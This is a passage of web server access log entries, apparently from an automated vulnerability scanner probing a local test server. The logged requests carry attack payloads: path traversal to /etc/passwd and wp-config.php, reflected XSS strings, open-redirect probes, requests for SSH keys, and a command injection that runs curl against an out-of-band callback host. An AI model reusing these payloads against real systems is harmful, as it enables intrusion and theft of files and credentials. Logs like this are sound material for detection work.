"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"\x22name\x22:\x22';$(curl http://ca285tosmpvbafqg07h0fhfh9skh3sr4w.oast.fun);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KAY9ih2Wcz16VQiMDOz6Ya8r3')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.148","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KAY9ih2Wcz16VQiMDOz6Ya8r3')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. 